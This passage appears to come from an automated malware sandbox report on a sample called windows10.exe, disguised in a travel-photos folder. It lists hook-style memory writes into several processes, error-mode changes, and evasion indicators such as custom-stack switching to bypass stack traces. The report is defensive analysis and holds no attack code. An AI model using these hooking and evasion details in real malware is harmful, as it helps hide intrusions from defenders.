            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 7772BA30 value: E9 DA 45 FF 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 740008 value: E9 8B 8E 03 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 77778E90 value: E9 80 71 FC 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 3890005 value: E9 8B 4D 1A 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 75A34D90 value: E9 7A B2 E5 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 38A0005 value: E9 EB EB 1A 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 75A4EBF0 value: E9 1A 14 E5 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 38B0005 value: E9 8B 8A D2 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 765D8A90 value: E9 7A 75 2D 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 38C0005 value: E9 2B 02 D4 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 76600230 value: E9 DA FD 2B 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 6E0005 value: E9 8B 2F 08 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 77762F90 value: E9 7A D0 F7 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 750005 value: E9 2B BA FD 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 7772BA30 value: E9 DA 45 02 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 760008 value: E9 8B 8E 01 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 77778E90 value: E9 80 71 FE 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 780005 value: E9 8B 4D 2B 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 75A34D90 value: E9 7A B2 D4 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 790005 value: E9 EB EB 2B 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 75A4EBF0 value: E9 1A 14 D4 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 39B0005 value: E9 8B 8A C2 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 765D8A90 value: E9 7A 75 3D 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 39C0005 value: E9 2B 02 C4 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8288 base: 76600230 value: E9 DA FD 3B 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 610005 value: E9 8B 2F 15 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 77762F90 value: E9 7A D0 EA 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 3960005 value: E9 2B BA DC 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 7772BA30 value: E9 DA 45 23 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 3970008 value: E9 8B 8E E0 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 77778E90 value: E9 80 71 1F 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 3990005 value: E9 8B 4D 0A 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 75A34D90 value: E9 7A B2 F5 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 39A0005 value: E9 EB EB 0A 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 75A4EBF0 value: E9 1A 14 F5 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 39C0005 value: E9 8B 8A C1 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 765D8A90 value: E9 7A 75 3E 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 39D0005 value: E9 2B 02 C3 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8304 base: 76600230 value: E9 DA FD 3C 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 6D0005 value: E9 8B 2F 09 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 77762F90 value: E9 7A D0 F6 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 6F0005 value: E9 2B BA 03 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 7772BA30 value: E9 DA 45 FC 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 860008 value: E9 8B 8E F1 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 77778E90 value: E9 80 71 0E 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 880005 value: E9 8B 4D 1B 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 75A34D90 value: E9 7A B2 E4 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 890005 value: E9 EB EB 1B 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 75A4EBF0 value: E9 1A 14 E4 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 8A0005 value: E9 8B 8A D3 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 765D8A90 value: E9 7A 75 2C 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 8B0005 value: E9 2B 02 D5 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8312 base: 76600230 value: E9 DA FD 2A 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 6D0005 value: E9 8B 2F 09 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 77762F90 value: E9 7A D0 F6 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 730005 value: E9 2B BA FF 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 7772BA30 value: E9 DA 45 00 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 740008 value: E9 8B 8E 03 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 77778E90 value: E9 80 71 FC 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 870005 value: E9 8B 4D 1C 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 75A34D90 value: E9 7A B2 E3 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 880005 value: E9 EB EB 1C 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 75A4EBF0 value: E9 1A 14 E3 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 890005 value: E9 8B 8A D4 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 765D8A90 value: E9 7A 75 2B 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 8A0005 value: E9 2B 02 D6 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8524 base: 76600230 value: E9 DA FD 29 8A Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1CA6817
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 13C3FE1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DCD28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D5CC61
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1EBB7DD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D9F9F2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1EC362F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D4FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 13E88A0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DE4F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1C6EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D86EF5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DEF32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F178CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D3DC69
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F7C9C0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E4EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1B9DC69
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1403FE1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1CAEB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E46F41
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F7C237
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E7D28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1EE8C0A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DFC9C0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 13EB8A4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1CA2E43
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1C9E90D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D3AF83
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E4837E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F2FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1EB0774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 20F78CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F902EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1B9AF83
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1B25C50
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1EFB7DD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DF02EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E0D28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D10774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 13CB8A4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1C5DC69
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D55D9C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 14B89BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1BFA8D4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1B95C50
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E4F9F2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D80774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E9F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E602EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1BAA8D4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1B1E90D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DBCC61
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D836DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E4F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E2D28A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F2362F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1BE5C50
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E0AEF7
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D6837E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E4FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D6EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E236DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DD0774
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 20178CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 15C88A0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F036DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1FC4F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F66EF5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 14689BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DFFE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DD36DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D1EB9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E2F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D8FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F578CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1D636DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1FA40E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DE6EF5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F778CC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E44F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 20440E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1EB02EA
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1EE4F13
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F1238B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 205B321
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 20940E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1521870
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1C0E90D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 201362F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F3F32F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1DB837E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 15089BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E9FE3A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 14DB8A4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1E736DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeAPI/Special instruction interceptor: Address: 1F34F13
